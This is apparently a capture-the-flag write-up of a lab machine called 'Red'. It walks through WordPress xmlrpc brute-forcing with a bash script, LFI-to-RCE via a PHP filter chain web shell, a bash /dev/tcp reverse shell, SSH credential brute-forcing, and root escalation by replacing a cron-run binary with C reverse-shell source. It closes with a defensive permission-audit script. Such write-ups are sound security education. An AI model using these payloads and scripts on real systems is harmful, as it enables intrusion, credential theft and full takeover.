Red 1 - Writeup

Dh89


Skills

- Virtual hosting
- Fuzzing
- xmlrpc | WordPress enumeration
- PHP filter chain LFI -> RCE
- MySQL database enumeration
- Lateral movement | Abusing time via sudo
- Abusing crontab | Privilege escalation

Reconnaissance

To begin, as always, we create our working directories.

$ mkdir Red
$ cd Red
$ mkdir nmap content exploit
$ ls
content  exploit  nmap

Next we scan the services exposed on the machine's ports.

$ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 192.168.0.9 -oN Allports
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2025-06-28 09:42 -03
Initiating ARP Ping Scan at 09:42
Scanning 192.168.0.9 [1 port]
Completed ARP Ping Scan at 09:42, 0.12s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:42
Scanning 192.168.0.9 [65535 ports]
Discovered open port 22/tcp on 192.168.0.9
Discovered open port 80/tcp on 192.168.0.9
Completed SYN Stealth Scan at 09:42, 6.15s elapsed (65535 total ports)
Nmap scan report for 192.168.0.9
Host is up, received arp-response (0.0054s latency).
Scanned at 2025-06-28 09:42:21 -03 for 6s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: D8:F3:BC:4D:AC:A3 (Liteon Technology)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

As we can see, ports 22 and 80 are open, which correspond to SSH and HTTP, so there is most likely a website.

Let's use the whatweb tool to see what it reports.

$ whatweb 192.168.0.9
http://192.168.0.9 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.0.9], MetaGenerator[WordPress 5.8.1], PoweredBy[--], Script, Title[Hacked By Red – Your site has been Hacked! You’ll never find the backdoor hahahah], UncommonHeaders[link], WordPress[5.8.1]

We can see there is a WordPress install behind it, and a rather eye-catching title.

Let's take a look at the site to see what it looks like.

The page looks fairly basic, but if we look at the source code we find the following.

We find multiple references to a domain, redrocks.win. This suggests virtual hosting is in use, so for our machine to resolve that name we need to add the IP and the domain to our /etc/hosts.

$ cat /etc/hosts 
127.0.0.1    localhost
::1    localhost ip6-localhost ip6-loopback
fe00::    ip6-localnet
ff00::    ip6-mcastprefix
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
127.0.0.1    exegol-default
$ echo "192.168.0.9    redrocks.win" >> /etc/hosts            
$ cat /etc/hosts                                  
127.0.0.1    localhost
::1    localhost ip6-localhost ip6-loopback
fe00::    ip6-localnet
ff00::    ip6-mcastprefix
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
127.0.0.1    exegol-default
192.168.0.9    redrocks.win

Now let's look at the page again.

As we can see, the page now loads correctly.

Let's do some fuzzing to see which interesting directories or files we can find.

$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.0.9/FUZZ -t 10
rss                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
login                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 101ms]
feed                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 69ms]
0                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 158ms]
atom                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 112ms]
wp-content              [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 11ms]
admin                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 108ms]
rss2                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 127ms]
wp-includes             [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 4ms]
rdf                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 149ms]
page1                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 118ms]
'                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
dashboard               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 97ms]
%20                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 103ms]

We see many directories, among them login, wp-content and admin.

Let's go through them to see what interesting things we find.

After checking, most of them redirect to the WordPress login and the rest download an XML structure that says the following:

<?xml version="1.0" encoding="UTF-8"?><feed
    xmlns="http://www.w3.org/2005/Atom"
    xmlns:thr="http://purl.org/syndication/thread/1.0"
    xml:lang="en-US"
    xml:base="http://redrocks.win/wp-atom.php"
    >
    <title type="text">Hacked By Red</title>
    <subtitle type="text">Your site has been Hacked! You’ll never find the backdoor hahahah </subtitle>

    <updated>2021-10-31T20:13:59Z</updated>

    <link rel="alternate" type="text/html" href="http://redrocks.win" />
    <id>http://redrocks.win/feed/atom/</id>
    <link rel="self" type="application/atom+xml" href="http://redrocks.win/feed/atom/" />

    <generator uri="https://wordpress.org/" version="5.8.1">WordPress</generator>
    <entry>
        <author>
            <name>administrator</name>
                            <uri>http://10.0.2.20</uri>
                        </author>

        <title type="html"><![CDATA[Hello Blue!]]></title>
        <link rel="alternate" type="text/html" href="http://redrocks.win/2021/10/24/hello-world/" />

        <id>http://10.0.2.20/?p=1</id>
        <updated>2021-10-31T20:13:59Z</updated>
        <published>2021-10-24T14:32:37Z</published>
        <category scheme="http://redrocks.win" term="Uncategorized" />
        <summary type="html"><![CDATA[Red was here, Blue is a loser!]]></summary>

                    <content type="html" xml:base="http://redrocks.win/2021/10/24/hello-world/"><![CDATA[<p>Red was here, Blue is a loser!</p>
<p><!-- Still Looking For It? Maybe you should ask Mr. Miessler for help, not that it matters, you won't be able to read anything with it anyway --></p>
]]></content>

                    <link rel="replies" type="text/html" href="http://redrocks.win/2021/10/24/hello-world/#comments" thr:count="1" />
            <link rel="replies" type="application/atom+xml" href="http://redrocks.win/2021/10/24/hello-world/feed/atom/" thr:count="1" />
            <thr:total>1</thr:total>
            </entry>
    </feed>

It seems there is a backdoor we could use to gain access.

After looking around a bit, I find a hyperlink in one of the site's posts.

It leads to another IP, on /wp-admin.

That redirects me to the typical WordPress admin panel; the only thing I can verify is that the user administrator exists, because it returns a different response.

Continuing to investigate, I find the following.

WordPress's xmlrpc.php is used to send XML-RPC requests; perhaps we can extract some information from it.

I intercept the request with Burp Suite and change the request method so it is sent via POST.

Sending the following:

<?xml version="1.0" encoding="utf-8"?>  
<methodCall>  
<methodName>system.listMethods</methodName>  
<params></params>  
</methodCall>

A basic structure that lets us list all the methods we can use.

We can attempt brute force using the wp.getUsersBlogs method (other methods such as wp.getCategories or metaWeblog.getUsersBlogs can be used as well).

I'm going to use a bash script.

#!/usr/bin/bash

# Restore the cursor and exit cleanly on Ctrl+C
function ctrl_c(){
  echo -e "\n\n[!] Exiting...\n"
  tput cnorm; exit 1
}
tput civis

# Build the wp.getUsersBlogs call for one password and send it to xmlrpc.php
function createXML(){
  password="$1"
  # Escape the characters that would break the XML document
  escaped="${password//&/&amp;}"
  escaped="${escaped//</&lt;}"
  xmlfile="<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>administrator</value></param>
<param><value>$escaped</value></param>
</params>
</methodCall>"

  echo "$xmlfile" > file.xml

  response=$(curl -s -X POST http://192.168.0.14/xmlrpc.php -d @file.xml)

  # An empty response means the request failed, not that the password is right
  if [ -n "$response" ] && ! echo "$response" | grep -q 'Incorrect username or password'; then
    echo -e "\nThe password for user administrator is $password"
    tput cnorm
    exit 0
  fi
}

# Ctrl+C
trap ctrl_c SIGINT

# Redirecting the wordlist (instead of piping cat) keeps the loop in the main
# shell, so exit inside createXML really stops the script
while read -r password; do
  createXML "$password"
done < /usr/share/wordlists/rockyou.txt
tput cnorm

Trying several wordlists, I don't manage to find the administrator's password.

Looking at the path http://redrocks.win/wp-json/wp/v2/users, we can see a list of available users, which confirms that only the user administrator exists.

Fuzzing for .php files, I see that I get an internal server error.

ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://192.168.0.14/FUZZ -t 40 -fl 10

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.0.14/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response lines: 10
________________________________________________

NetworkFileManagerPHP.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 5807ms]

Backdoors are usually of the form example.php?var=<command>, so now we need to find that variable.

After several attempts (using threads or sending many requests for a long time made the machine hang), I manage to discover the variable key.

The URL would look like this: http://redrocks.win/NetworkFileManagerPHP.php?key

I try to execute commands, but it doesn't let me, until I try pointing it at a file and see the following.

So it seems we have an LFI (Local File Inclusion); let's enumerate.

To gain access directly I'm going to use a PHP filter chain.

This technique could have its own chapter explaining how it works; I'll explain it briefly and, if you like, give a deeper explanation in the future.

Basically it consists of abusing how data is represented in Unicode depending on the encoding used (for example UTF-8, UTF-7, etc.).

The interesting part is that we can keep switching between encodings to produce the characters we want in the response. In this case I'm going to produce a simple PHP web shell, <?php echo shell_exec($_GET[cmd]); ?>, where the cmd variable is used to execute the desired command.

To find the sequence of conversions I need, I'll use the following project → php_filter_chain

The payload would look like this:

python3 php_filter_chain_generator.py --chain '<?php echo shell_exec($_GET['cmd']); ?>'
[+] The following gadget chain will generate the following code : <?php echo shell_exec($_GET[cmd]); ?> (base64 value: PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUW2NtZF0pOyA/Pg)

Pasting the generated chain into the URL and appending &cmd=<command> at the end executes the command.

In this case I ran whoami and we see www-data, so we have command execution; let's catch a shell with pwncat.

Instead of whoami, send the following line: bash -c "bash -i >%26 /dev/tcp/192.168.0.8/4443 0>%261" (the %26 is a URL-encoded & so it survives the query string).

pwncat-cs :4443
[17:27:33] Welcome to pwncat 🐈!                                                                       __main__.py:164
[17:27:35] received connection from 192.168.0.14:42536                                                      bind.py:84
[17:27:37] 192.168.0.14:42536: registered new host w/ db

pwncat is quite a powerful tool for transferring files and moving between your attacking machine and the victim, among other things.

Privilege Escalation

Now it's time to enumerate the system to see what we find.

Checking the path /var/www/wordpress, I find the configuration file.

ls
 %26                license.txt     wp-comments-post.php    wp-includes        wp-settings.php
 %261                readme.html     wp-config-sample.php    wp-links-opml.php   wp-signup.php
'%261'$'\n'            wp-activate.php     wp-config.php        wp-load.php        wp-trackback.php
 NetworkFileManagerPHP.php   wp-admin         wp-content        wp-login.php        xmlrpc.php
 index.php            wp-blog-header.php   wp-cron.php        wp-mail.php

It contains the following credentials:

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'john' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );

The user exists, so I'll try to connect via SSH to see if it works.

But no, it doesn't work; let's try connecting to MySQL to see what we find.

mysql -u john -p 
Enter password: # R3v_m4lwh3r3_k1nG!!
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4906
Server version: 8.0.26-0ubuntu0.20.04.3 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
show databases();
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '()' at line 1
mysql> You will never win Blue

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.14 sec)

mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
| ID | user_login    | user_pass                          | user_nicename | user_email    | user_url         | user_registered     | user_activation_key | user_status | display_name  |
+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
|  1 | administrator | $P$BHts8T4UWtFsg2Od/BqoFMxZoktTsq. | administrator | red@rocks.com | http://10.0.2.20 | 2021-10-24 14:32:37 |                     |           0 | administrator |
+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
1 row in set (0.00 sec)

We have the administrator's password, but it is stored as a hash. We could try to crack it, but since we already brute-forced earlier, I don't think it's worth it.

After several attempts, it occurred to me to make a list of variations of the password we have; this can be done with hashcat.

hashcat --stdout pass -r /usr/share/hashcat/rules/best64.rule

R3v_m4lwh3r3_k1nG!!
!!Gn1k_3r3hwl4m_v3R
R3V_M4LWH3R3_K1NG!!
r3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!0
R3v_m4lwh3r3_k1nG!!1
R3v_m4lwh3r3_k1nG!!2
R3v_m4lwh3r3_k1nG!!3
R3v_m4lwh3r3_k1nG!!4
R3v_m4lwh3r3_k1nG!!5
R3v_m4lwh3r3_k1nG!!6
R3v_m4lwh3r3_k1nG!!7
R3v_m4lwh3r3_k1nG!!8
R3v_m4lwh3r3_k1nG!!9
R3v_m4lwh3r3_k1nG!!00
R3v_m4lwh3r3_k1nG!!01
R3v_m4lwh3r3_k1nG!!02
R3v_m4lwh3r3_k1nG!!11
R3v_m4lwh3r3_k1nG!!12
R3v_m4lwh3r3_k1nG!!13
R3v_m4lwh3r3_k1nG!!21
R3v_m4lwh3r3_k1nG!!22
R3v_m4lwh3r3_k1nG!!23
R3v_m4lwh3r3_k1nG!!69
R3v_m4lwh3r3_k1nG!!77
R3v_m4lwh3r3_k1nG!!88
R3v_m4lwh3r3_k1nG!!99
R3v_m4lwh3r3_k1nG!!123
R3v_m4lwh3r3_k1nG!!e
R3v_m4lwh3r3_k1nG!!s
R3v_m4lwh3r3_k1nG!a
R3v_m4lwh3r3_k1nGs
R3v_m4lwh3r3_k1nGa
R3v_m4lwh3r3_k1nGer
R3v_m4lwh3r3_k1nGie
R3v_m4lwh3r3_k1no
R3v_m4lwh3r3_k1ny
R3v_m4lwh3r3_k1n123
R3v_m4lwh3r3_k1nman
R3v_m4lwh3r3_k1ndog
1R3v_m4lwh3r3_k1nG!!
theR3v_m4lwh3r3_k1nG!!
d3v_m4lwh3r3_k1nG!!
mav_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3v_m4lwh3r3_k1nG!!
R3_m4lwh3r3_k1nG!!
R3m4lwh3r3_k1nG!!
R3vm4lwh3r3_k1nG!!
R3v_4lwh3r3_k1nG!!
R3vm
R3v_m1
R3v_m4lwh3r3_k1nG!
R3v_m4lwh3r3_k1nG
R3v_m4lwh3r3_k1n
R3v_m4lwh3r3_k1nR3v_m4lwh3r3_k1n
Rv_m4lwh3r3_k1n
1nG!
h3r3_k1nG!!v_m4lw
R3v_m4lwh3r3_k1n!
 3v_m4lwh3r3_k1nG
G!!R3v_m4lwh3r3_k1n
nG!!
1nG!!
k1nGk1nG
n3v_
_mR_mR
Z3v_m4lwh3r3_k1nG!!
U_m4lwh3r3_k1nG!!
R3v_lw
R3vmR3vm
_mR
R3r3R3r3
Rrlw
R3v_ml
R4lwh3

We simply copy and paste it into a file and try it against the users we have.

After a while we see the following.

medusa -M ssh -h 192.168.0.14 -u john -P passwords
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3v_m4lwh3r3_k1nG!! (1 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: !!Gn1k_3r3hwl4m_v3R (2 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3V_M4LWH3R3_K1NG!! (3 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: r3v_m4lwh3r3_k1nG!! (4 of 77 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.0.14 (1 of 1, 0 complete) User: john (1 of 1, 0 complete) Password: R3v_m4lwh3r3_k1nG!!0 (5 of 77 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.0.14 User: john Password: R3v_m4lwh3r3_k1nG!!0 [SUCCESS]

The password appears to be R3v_m4lwh3r3_k1nG!!0; I'll connect via SSH to see if it works.

ssh john@192.168.0.14  
john@192.168.0.14's password: 
Last login: Wed Oct 27 02:05:25 2021 from 10.0.2.15
john@red:~$

After gaining access as john, I run sudo -l to see whether I have any permissions.

sudo -l
Matching Defaults entries for john on red:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on red:
    (ippsec) NOPASSWD: /usr/bin/time

This is straightforward: we can use the page → gtfobins and search for time to move laterally to ippsec.

Another thing about this machine is that every so often it kicks you off the server and you can't use cat to read files. It also prints some messages to the console to annoy you.

So I used less, and then I had to use medusa again to find the password and then quickly become ippsec.

sudo -u ippsec /usr/bin/time /bin/sh
$ bash
ippsec@red:/home/john$

I decided to list the files I have access to through my group.

ippsec@red:~$ find / -group ippsec 2>/dev/null | grep -v "/proc"
/var/www/wordpress/.git
/home/ippsec
/home/ippsec/.bash_logout
/home/ippsec/.profile
/home/ippsec/.bashrc
/home/ippsec/user.txt

I see an odd-looking .git; its contents are the following.

ls -la
total 32
drwxrwx--- 2 root     ippsec    4096 Jul 22 20:56 .
drwxr-xr-x 6 www-data www-data  4096 Jul 21 20:26 ..
-rwxr-xr-x 1 root     root     16712 Jul 22 20:56 rev
-rw-r--r-- 1 root     root       123 Oct 31  2021 supersecretfileuc.c

#include <stdio.h>

int main()
{

    // prints hello world
    printf("Get out of here Blue!\n");

    return 0;
}

That is the content of supersecretfileuc.c shown above; that message is the one I remember seeing on the console.

So it suggests that it might be executed periodically.

Since it's compiled, I could try modifying its contents and compiling it under the same name so that it sends me a shell, to see which user is executing it.

We can simply use the page → Online-Revershell to create our payload.

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 4443;                        /* listener port on the attacking machine */
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.0.8");   /* attacking machine IP */

    /* connect back; if the listener is not up there is nothing to attach to */
    if (connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)) != 0) {
        return 1;
    }
    /* point stdin, stdout and stderr at the socket */
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    /* replace this process with a shell attached to the socket */
    char * const argv[] = {"/bin/bash", NULL};
    execvp("/bin/bash", argv);

    return 0;
}

Then we wait for the connection with nc and the new rev gets executed. Apparently it is recompiled every so often.

nc -nlvp 4443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4443
Ncat: Listening on 0.0.0.0:4443
Ncat: Connection from 192.168.0.14.
Ncat: Connection from 192.168.0.14:54452.
root@red:/var/www/wordpress/.git$ whoami
root
root@red:/var/www/wordpress/.git$
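As an added example (not the machine's or the author's code), the following Python audit captures the defender's lesson from this escalation: a binary that a root cron job compiles and runs must not live under a directory its group or others can write. It rebuilds the group-writable .git layout under a temporary directory, flags it, and shows that clearing the group write bit removes the finding; the temporary layout, the placeholder rev script and the remediate() helper are constructed for the example.

```python
import os
import stat
import tempfile

GROUP_OR_WORLD_WRITE = stat.S_IWGRP | stat.S_IWOTH


def audit_cron_target(path, base):
    """Walk every component of `path` below `base` and return
    [(component, mode_string)] for those that group or others can write.
    Any such component lets a non-owner swap what the cron job executes."""
    real_base = os.path.realpath(base)
    rel = os.path.relpath(os.path.realpath(path), real_base)
    findings = []
    current = real_base
    for part in rel.split(os.sep):
        current = os.path.join(current, part)
        st = os.lstat(current)
        if st.st_mode & GROUP_OR_WORLD_WRITE:
            findings.append((os.sep + os.path.relpath(current, real_base),
                             stat.filemode(st.st_mode)))
    return findings


def remediate(component, base):
    """Clear the group/other write bits on one flagged component (constructed helper)."""
    target = os.path.join(os.path.realpath(base), component.lstrip(os.sep))
    mode = stat.S_IMODE(os.lstat(target).st_mode)
    os.chmod(target, mode & ~GROUP_OR_WORLD_WRITE)


def build_demo_layout(base):
    """Constructed copy of the layout found on the box: /var/www/wordpress/.git is
    drwxrwx--- (group-writable) and holds the binary the root cron job runs."""
    wp = os.path.join(base, "var", "www", "wordpress")
    git = os.path.join(wp, ".git")
    os.makedirs(git)
    rev = os.path.join(git, "rev")
    with open(rev, "w") as f:
        f.write("#!/bin/sh\necho placeholder\n")  # stands in for the compiled rev
    for d in (os.path.join(base, "var"), os.path.join(base, "var", "www"), wp):
        os.chmod(d, 0o755)
    os.chmod(git, 0o770)  # the dangerous bit: group ippsec can replace rev
    os.chmod(rev, 0o755)
    return rev


def run_demo():
    """Build the constructed layout, audit it, fix it, audit again."""
    base = tempfile.mkdtemp()
    rev = build_demo_layout(base)
    before = audit_cron_target(rev, base)
    for component, _ in before:
        remediate(component, base)
    after = audit_cron_target(rev, base)
    return before, after


if __name__ == "__main__":
    before, after = run_demo()
    print("before:", before)
    print("after: ", after)
```

On the real box the same check would be run with base="/" against each path a root crontab entry executes.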

Conclusions

Honestly, quite an interesting machine. Having the shell closed every so often, along with the other annoyances you run into as you go, is something I hadn't seen before, but we covered many techniques and interesting things.

As always, for any questions or queries you can use the comments section or contact me on Discord: #Varovish/varovish.

Written by

Dh89

I'm a cybersecurity enthusiast, Discord -> Varovish/varovish